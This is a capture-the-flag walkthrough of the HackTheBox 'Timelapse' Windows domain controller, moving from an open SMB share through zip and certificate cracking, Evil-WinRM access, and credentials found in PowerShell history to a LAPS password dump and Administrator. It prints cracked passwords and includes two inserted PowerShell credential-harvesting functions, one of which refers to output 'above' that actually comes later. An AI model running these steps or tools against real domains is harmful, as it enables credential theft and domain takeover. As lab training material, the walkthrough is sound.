Metadata

  • Platform: HackTheBox
  • CTF: Timelapse
  • OS: Windows
  • Difficulty: Easy

Summary

An open SMB share hands us a password-protected zip archive. Once we crack it, we obtain a password-protected .pfx container, which is also crackable. Extracting the certificate and its private key from that container gives us a foothold on the target over WinRM.

In the PowerShell history of this compromised user we find the credentials of another account. On further inspection, that account is allowed to read the LAPS-managed local Administrator password of the domain controller. After requesting it from the directory, we compromise the host entirely.

Solution

Reconnaissance

Nmap reveals that we are dealing with an Active Directory domain controller: DNS, Kerberos, LDAP (plus Global Catalog) and SMB are all exposed by a host named DC01 in the domain timelapse.htb.

nmap -sC -sV 10.10.11.152 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 18:59 CET
Nmap scan report for 10.10.11.152
Host is up (0.058s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-03-18 20:04:08Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
5986/tcp open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2025-03-18T20:05:38+00:00; +2h04m27s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-03-18T20:04:54
|_  start_date: N/A
|_clock-skew: mean: 2h04m24s, deviation: 3s, median: 2h04m21s

There is one unusual thing about this target: WinRM over plain HTTP on port 5985 is not exposed, but WinRM over HTTPS on port 5986 is. We should remember this in case we want to use Evil-WinRM. The clock skew of roughly two hours (see the ssl-date and clock-skew lines) is also worth noting: Kerberos tolerates only five minutes of skew by default, so any Kerberos-based tooling later on has to account for it.

Using smbclient we can browse the Shares share in a NULL session; it contains two directories. In Dev we find a winrm_backup.zip file, and HelpDesk holds the LAPS installer and its documentation, which already hints at how local administrator passwords are managed in this domain.

smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021
 
 
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 21:40:06 2021
  ..                                  D        0  Mon Oct 25 21:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 17:46:42 2021
 
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 17:48:42 2021
  ..                                  D        0  Mon Oct 25 17:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 16:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 16:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 16:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 16:57:44 202

User Flag

After downloading this file and trying to extract it, we notice that it requires a password. Since we do not have one, we can use the zip2john utility from John the Ripper to turn the archive into a crackable hash (saved to a file named hash here), which we then crack with either John the Ripper or Hashcat. In the Hashcat command below, -m 17220 selects the PKZIP hash mode and --user tells Hashcat to ignore the file name that zip2john prepends to the hash.

hashcat hash --user -m 17220 /usr/share/wordlists/rockyou.txt 
<cut>
$pkzip$1*1*2*0<cut>6452f76*$/pkzip$:supremelegacy
<cut>

Once we unzip the archive with supremelegacy as the password, we get a new file, legacyy_dev_auth.pfx. This is a PKCS#12 container holding a certificate and its private key, which can be used for certificate-based WinRM authentication. To get a shell with it, we need to extract both the private key and the certificate with openssl. However, as soon as we try, we get an error.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem 
Enter Import Password:
Mac verify error: invalid password?

This file is also password protected. To crack it we can use pfx2john from the John the Ripper suite; its output, saved as legacyy_dev_auth.pfx.hash, is what john loads below. Since Hashcat does not support cracking .pfx files, John the Ripper is the tool here.

john legacyy_dev_auth.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:41 DONE (2025-03-18 19:52) 0.02398g/s 77481p/s 77481c/s 77481C/s thugways..thugers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we can extract the certificate and key from the container, using thuglegacy as the import password. openssl first writes the key as an encrypted PEM and asks for a new PEM pass phrase, so a final openssl rsa step strips that pass phrase again and yields a plain key that Evil-WinRM can use.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
 
openssl pkcs12 -in legacyy_dev_auth.pfx  -clcerts -nokeys -out cert.crt
Enter Import Password:
 
openssl rsa -in private.pem -out private2.pem
Enter pass phrase for private.pem:
writing RSA key

At this point we can only guess that the user this certificate belongs to is legacyy, because the guess rests on nothing but the file name (inspecting the certificate's subject and Subject Alternative Name with openssl x509 is the more reliable check). Since we have guest access to SMB, we can enumerate the domain's users by brute-forcing RIDs and confirm that legacyy exists.

netexec smb 10.10.11.152 --users -p "" -u "guest" --rid-brute
<cut>
SMB         10.10.11.152    445    DC01             1601: TIMELAPSE\thecybergeek (SidTypeUser)
SMB         10.10.11.152    445    DC01             1602: TIMELAPSE\payl0ad (SidTypeUser)
SMB         10.10.11.152    445    DC01             1603: TIMELAPSE\legacyy (SidTypeUser)
SMB         10.10.11.152    445    DC01             1604: TIMELAPSE\sinfulz (SidTypeUser)
SMB         10.10.11.152    445    DC01             1605: TIMELAPSE\babywyrm (SidTypeUser)
SMB         10.10.11.152    445    DC01             1606: TIMELAPSE\DB01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             1607: TIMELAPSE\WEB01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             1608: TIMELAPSE\DEV01$ (SidTypeUser)
SMB         10.10.11.152    445    DC01             2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
SMB         10.10.11.152    445    DC01             3101: TIMELAPSE\Development (SidTypeGroup)
SMB         10.10.11.152    445    DC01             3102: TIMELAPSE\HelpDesk (SidTypeGroup)
SMB         10.10.11.152    445    DC01             3103: TIMELAPSE\svc_deploy (SidTypeUser)

Finally, we can use the certificate and key to log in via Evil-WinRM. Remember the -S flag: it switches Evil-WinRM to SSL and to port 5986, since 5985 is not available.

evil-winrm -i 10.10.11.152 -u timelapse.htb/legacyy -k private2.pem -c cert.crt  -S 

Once we are in, it is possible to claim the user flag.

7874431c5394e74e8e12566c25941e37

Root Flag

Usually, I would now start using our credentials to gather information about the domain. But certificate authentication gave us a WinRM shell and nothing more: we do not have a password for this account, so we cannot simply query the whole domain with the usual LDAP tooling. We first need to acquire credentials elsewhere. A straightforward place to start is the PowerShell command history that PSReadLine keeps, unless it has been deleted.

(Get-PSReadlineOption).HistorySavePath
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txt

The file named in the output is the one this remoting session would write to and does not exist yet, but the interactive console's history, ConsoleHost_history.txt, is present in the same folder.

cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

It looks like the user legacyy once tested a WinRM session as svc_deploy and left the password in the history, so we now have the credentials svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV. Before we enumerate this domain in its entirety, we should check this account's group memberships.
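The history hunt above checked one file in one profile. The following PowerShell function, an added example that is not part of the original writeup, walks the PSReadLine directory of every profile the current shell can read, picks up both the ConsoleHost and ServerRemoteHost history files, and reports lines that look like they carry a secret. The profile root follows the Windows default and the keyword regex is an assumption to be extended per engagement.

```powershell
# Added example: find credential-looking lines in PSReadLine history files.
# PSReadLine writes one file per host: ConsoleHost_history.txt for the
# interactive console and ServerRemoteHost_history.txt for remoting sessions.
function Find-CredentialsInPSHistory {
    [CmdletBinding()]
    param(
        # Root of the user profiles; C:\Users is the Windows default.
        [string]$ProfileRoot = 'C:\Users',
        # Tokens that commonly sit next to a secret on a command line (assumed list).
        [string]$Pattern = 'ConvertTo-SecureString|PSCredential|-Password|-p\s|passw|secret|token|net user'
    )

    $relative = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine'

    # Profiles we cannot read (other users, as a low-privileged account) are skipped silently.
    foreach ($userDir in Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        $dir = Join-Path $userDir.FullName $relative
        if (-not (Test-Path -LiteralPath $dir)) { continue }

        foreach ($file in Get-ChildItem -LiteralPath $dir -Filter '*_history.txt' -ErrorAction SilentlyContinue) {
            # Select-String is case-insensitive by default and keeps the line number,
            # so a hit can be read in context with Get-Content afterwards.
            Select-String -LiteralPath $file.FullName -Pattern $Pattern | ForEach-Object {
                [pscustomobject]@{
                    User    = $userDir.Name
                    File    = $file.Name
                    Line    = $_.LineNumber
                    Command = $_.Line.Trim()
                }
            }
        }
    }
}

# Where the current session would write its own history; this differs from the
# interactive console's file, which is why both names are searched above.
(Get-PSReadLineOption).HistorySavePath

Find-CredentialsInPSHistory | Format-Table -AutoSize -Wrap
```

Run it from the Evil-WinRM session as legacyy. On this box only the legacyy profile is readable, so the single hit is the ConvertTo-SecureString line shown above; on a shared jump host the same function routinely turns up secrets from several users.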

net users svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM
 
Logon hours allowed          All
 
Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

svc_deploy is a member of the global group LAPS_Readers. In a legacy LAPS deployment (the LAPS.x64.msi from the HelpDesk share) the local Administrator password is stored in cleartext in the computer object's ms-Mcs-AdmPwd attribute, and reading that attribute is a right that has to be explicitly delegated; here it was delegated to LAPS_Readers. So this account can read the local Administrator password of the domain controller, and there are several ways to do that (the ActiveDirectory module, the LAPS PowerShell module, any LDAP client). To avoid introducing yet another very specific tool, NetExec's laps module will get the job done and dump all LAPS passwords it is allowed to read.
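For the case where no attacker tooling is on hand, this added example (not the writeup's own code) reads the same attributes straight over LDAP with System.DirectoryServices, which ships with Windows and needs no RSAT or ActiveDirectory module. Host, domain and account name come from the writeup; the function layout and the attribute decoding are mine. Legacy LAPS stores the password in ms-Mcs-AdmPwd and the expiry as a FILETIME in ms-Mcs-AdmPwdExpirationTime.

```powershell
# Added example: read legacy LAPS passwords over LDAP with System.DirectoryServices.
function Get-LapsPassword {
    [CmdletBinding()]
    param(
        [string]$Server   = 'dc01.timelapse.htb',
        [string]$Domain   = 'timelapse.htb',
        [string]$Username = 'svc_deploy',
        [Parameter(Mandatory)][string]$Password,
        # Restrict to one computer by sAMAccountName (e.g. DC01$); empty means every computer.
        [string]$Computer = ''
    )

    # timelapse.htb -> DC=timelapse,DC=htb
    $baseDn = 'DC=' + (($Domain -split '\.') -join ',DC=')

    # Bind as the LAPS reader; DirectoryEntry uses Negotiate (Kerberos/NTLM) by default.
    $root = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server/$baseDn", "$Domain\$Username", $Password)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)

    # The presence filter on ms-Mcs-AdmPwd only matches if we may read the attribute:
    # a confidential attribute we lack rights to is treated as absent by the DC, so an
    # empty result means either "no LAPS on this computer" or "no read permission".
    $searcher.Filter = if ($Computer) {
        "(&(objectCategory=computer)(sAMAccountName=$Computer)(ms-Mcs-AdmPwd=*))"
    } else {
        '(&(objectCategory=computer)(ms-Mcs-AdmPwd=*))'
    }
    [void]$searcher.PropertiesToLoad.AddRange(@(
        'sAMAccountName', 'dNSHostName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'
    ))

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties   # keys are returned lower-cased
        $expiry = $null
        if ($p['ms-mcs-admpwdexpirationtime'].Count -gt 0) {
            # Expiration is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC).
            $expiry = [DateTime]::FromFileTimeUtc([int64]$p['ms-mcs-admpwdexpirationtime'][0])
        }
        [pscustomobject]@{
            Computer = $p['samaccountname'][0]
            Host     = $p['dnshostname'][0]
            Password = $p['ms-mcs-admpwd'][0]
            Expires  = $expiry
        }
    }
}

# Run from the legacyy WinRM shell, which can reach the DC; the bind itself is as svc_deploy.
Get-LapsPassword -Password 'E3R$Q62^12p7PLlC%KWaxuaV' -Computer 'DC01$'
```

Two caveats a practitioner will want: legacy LAPS records no account name (that is why the NetExec output above shows an empty User field), so if the managed local administrator has been renamed via policy the password belongs to that account rather than to Administrator; and the expiry value is worth reading, because a password that was just rotated by the scheduled policy refresh will not match what a stale dump contains.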

nxc ldap "10.10.11.152" -d "timelapse.htb" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV' --module laps
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.152    389    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV 
LAPS        10.10.11.152    389    DC01             [*] Getting LAPS Passwords
LAPS        10.10.11.152    389    DC01             Computer:DC01$ User:                Password:3%+q700%/2C%+1/(cHF3#t$#

With the password 3%+q700%/2C%+1/(cHF3#t$#, we can now use Evil-WinRM to get a shell as Administrator on the domain controller, again with the -S flag. Because the host is a domain controller it has no separate local SAM, so the account LAPS manages here is the built-in domain Administrator, which is why this one password is enough for full control of the domain. The root flag is on the desktop of the TRX user.

evil-winrm -i 10.10.11.152 -u Administrator -p '3%+q700%/2C%+1/(cHF3#t$#' -S
449dbb9b1b26c6f10e77dbd16902d674